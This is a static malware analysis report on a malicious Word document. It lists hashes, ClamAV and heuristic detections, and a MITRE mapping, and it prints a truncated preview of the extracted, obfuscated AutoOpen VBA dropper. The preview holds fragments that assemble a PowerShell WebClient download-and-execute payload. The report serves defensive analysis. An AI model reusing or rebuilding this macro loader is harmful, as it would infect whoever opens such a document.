Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13eaf5f089055876…

MALICIOUS

Office (OLE)

Size: 140.5 KB
Created: 2018-02-13 08:53:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: d7f9255a6f5d2a66bd2b0981d404f6ba
SHA-1: 37130b7a19d70c1e1966a1afbc9ed4ab1d070d95
SHA-256: 13eaf5f089055876e7d7e1a387994302bb5d39a42ae1e4dfce6e129a9f0ae421
Risk Score: 302

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing obfuscated VBA macros. The AutoOpen macro is designed to execute arbitrary code using Shell() and CreateObject, likely to download and run a second-stage payload. The use of obfuscation and the AutoOpen entry point are common tactics for malware droppers.

Heuristics (8)

  • CLAMAV_DETECTION [critical]: ClamAV: Doc.Dropper.Agent-6447492-0
    ClamAV detected this file as malware: Doc.Dropper.Agent-6447492-0
  • OLE_VBA_MACROS [medium, 4 related findings]: VBA macros detected
    Document contains VBA macro code
  • OLE_VBA_SHELL [critical]: Shell() call in VBA
    Shell() call in VBA
  • OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER [critical]: Obfuscated auto-exec VBA loader
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • OLE_VBA_AUTOOPEN [high]: AutoOpen macro
    AutoOpen macro
  • OLE_VBA_PCODE_AUTOEXEC_EXEC [high]: VBA p-code auto-exec with execution tokens
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC [medium]: Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL [info]: Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 30505 bytes
SHA-256: 873cbcaceb63aa163550f6e349cc522c64dff0afb89c3df77dda83b8d14430ff

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HnWiLRvzWSYTXm"
Sub AutoOpen()
On Error Resume Next
YftLNRFJi = bhTj - Sgn(RisjCSKH) - (5569024 - Tan(4764479) / 9242136 - ChrW(iLsamjzYihsGwJ))
IoSEhISfM = wDWCO - Sgn(QmRUawld) - (7917200 - Tan(197943) / 3963796 - ChrW(njqm))
jsKWoYrnf = zhijKzKJQFociK - Sgn(pPj) - (7697530 - Tan(1928765) / 8299455 - ChrW(UJTdrskru))
Application.Run "TmqUtFjcCszPR", lRFoAzZiAJolhs
dobwEzFqX = iTkzHJATzJLzVI - Sgn(NUQhFSZY) - (2155105 - Tan(2160808) / 7762456 - ChrW(LzqJ))
pQLMJjMMU = YkijiSTbripJS - Sgn(EuZmSCoVIz) - (4213141 - Tan(6719649) / 1840638 - ChrW(NdIEMNuoqcjVn))
kGLUjzjHP = ZtSDC - Sgn(jNvJYNNWl) - (9340062 - Tan(992118) / 7259568 - ChrW(EzFzOD))
End Sub
Function lRFoAzZiAJolhs()
On Error Resume Next
NtcEtw = UTnjQddO - Sgn(DHtsMv) - (5450727 - Tan(1644272) / 8374277 - ChrW(tiGLBdF))
LHHRBd = mwAVjWTSvtbjd - Sgn(RSNjWZjWbEWXr) - (7587960 - Tan(2683237) / 1567470 - ChrW(FLjrQNhaWYu))
wRmwhrfUG = ijL - Sgn(zQozVHfLPWvz) - (1899906 - Tan(5943621) / 6217311 - ChrW(nIW))
JdFozd = psXqEBNjYGp + Mid(PjLzHYjjRnP + "Sicwlvr+lvrNet.WebClilvr+lvrelvr+lvrnlmCP+mCPvr+lvrt;lvrK4w+K4w+lvr6IolvrmCP+mCP+lvrNSB =lvrhKKCkIUV" + vSDNNrk, 5, 88)
SkaXjfqd = qvtPi - Sgn(PHiVtiX) - (7843637 - Tan(5591981) / 7205793 - ChrW(idsYo))
tTipw = cHnwpHIz - Sgn(RNUlz) - (1359987 - Tan(8294550) / 8478450 - ChrW(qCC))
QazYvUA = PusnGiLkhm - Sgn(ZQI) - (9121061 - Tan(3836266) / 5066746 - ChrW(VWk))
JwVib = uEBFfFzBpW + Mid(YLjtWZKPwjYbt + "nZRTNBPbZjRUlI+ lvr+mCP+mCPlvrvlvr+K4w+K4wllFjWIsQFTzIErnwdWzwAwiMB" + hQrsqNa, 15, 29)
NSFjnZfm = phjzCkZv - Sgn(jYzpDPE) - (4179022 - Tan(3047946) / 441697 - ChrW(YzuiLc))
QQuVwT = AfCDrMSsEn - Sgn(pIjGjuOauXDHNj) - (8731798 - Tan(1792104) / 227962 - ChrW(mzmaCYPSchmW))
jdiiJftQJA = LQYat - Sgn(SSAUliKzYoU) - (9593919 - Tan(672931) / 3352990 - ChrW(SqK))
JoBRLjA = JTrlCmks + Mid(mUustFBBan + "zoiaBS+lvre8'+'JK4w+K4wlvr+lvr/vRG.Splvr+lvrlit(vRGlvr+lvr?vRGlvr+lmCP+'+'mCPvr);6lvr+lvrIoSDC =lv'+'r+lvr 6Iolvr+lvrenvlK4w+K4wvr+lvr:K4w+KmtiFDjIzkJNIPjOjAFzmcBX" + jbTMjzvY, 7, 135)
lEbzKl = inzK - Sgn(EizLwcidfMJWOj) - (9756336 - Tan(6976389) / 1917898 - ChrW(FRBzPbwMzGTDqD))
NUWBNAcjNM = tWJdwlFWhN - Sgn(DpZudU) - (4701977 - Tan(8039743) / 8524795 - ChrW(zFSYOldcJbWFo))
ijnrRn = KpGNLzu - Sgn(mCXHnEc) - (9790807 - Tan(6036693) / 102501 - ChrW(owQqF))
tzTWump = GHqNRhnXL + Mid(qpIzaiYmdBssb + "zYmCcG YJvCP+mCP4wpublK4w+K4wilvr+lvrclvr+lvr K4w+K4wKFGDBkfUGAatJmUmVrZbpjChwFI" + dHjiFKsaNLnbc, 11, 43)
XVCqulL = WuAXtwAjLXAwBL - Sgn(HiUokUWS) - (8247203 - Tan(3772135) / 9611712 - ChrW(EaBDvMoUD))
QpsSiPYoXNS = jqp - Sgn(iSVzjR) - (1019642 - Tan(5295839) / 9910005 - ChrW(EKZbzb))
lpiVRWq = EvYwG - Sgn(TFjMq) - (4126076 - Tan(1375828) / 470591 - ChrW(zXqDwtmjV))
RzjjQOMM = AcuXlqwAEkoO + Mid(itzdS + "INJOdGNpTLNbuRvrRGmCP+mCPOXZvRG lK4w+K4wvrmCP+mCP+lvr+lvr+mIBUviZuiLsjlStX" + AHwYzK, 15, 45)
InIPju = LClvfPRPD - Sgn(fXUUwzV) - (8736131 - Tan(3071473) / 5046867 - ChrW(iGSvuBpaGX))
osSVVsciHui = ZZZkbZwbKj - Sgn(zsliXA) - (1108657 - Tan(8856675) / 2433638 - ChrW(mrdvSAlOc))
zwcAWzf = zwwzuuLXvwoP - Sgn(TIZ) - (1874533 - Tan(2248584) / 5605866 - ChrW(ULKGnhwpIYLM))
VHQmhqo = amzkmMVcrcv + Mid(QYICsz + "P+lvrK4w+K4wvRlvr+lvrGe-lvr+lvmCP+mCPrIlK4w+K4wvr+lvK4w+K4wrtemvlvr+lvrmCP'+'+mCPRG)(6IoSDC);bmCP+mCPreaK4w+K4wlvrK4w+K4w+lK4w+K4wvrklvr+lvr;}catclvr+lvrh{lvr+lvr}lvr+lvr}lvrK4w+'+'rlYFlzBwIBwnKwbzNWfmAGl" + PGsM, 2, 180)
AWNBkz = XlbjKC - Sgn(iVYA) - (9855322 - Tan(7539661) / 2618781 - ChrW(SQrnCQhlbvYfQ))
EpLmK = daiS - Sgn(biMqfGf) - (2802558 - Tan(4078060) / 296891 - ChrW(ojXrYtVKUwp))
wMYzj = AlmXrZrzVjUmPG - Sgn(MhXBMkpGr) - (1616884 - Tan(4767727) / 6162288 - ChrW(ETwTmfLEtjo))
pljIJfUS = rRBvondphwPn + Mid(pJmsqZln + "nMJFTSELQXkpCGFUWqaPcS).REplACe(mCPlZCmCP,mCPt'+'eHmCP).REplACe(mCPx2lmCP,m
... (truncated)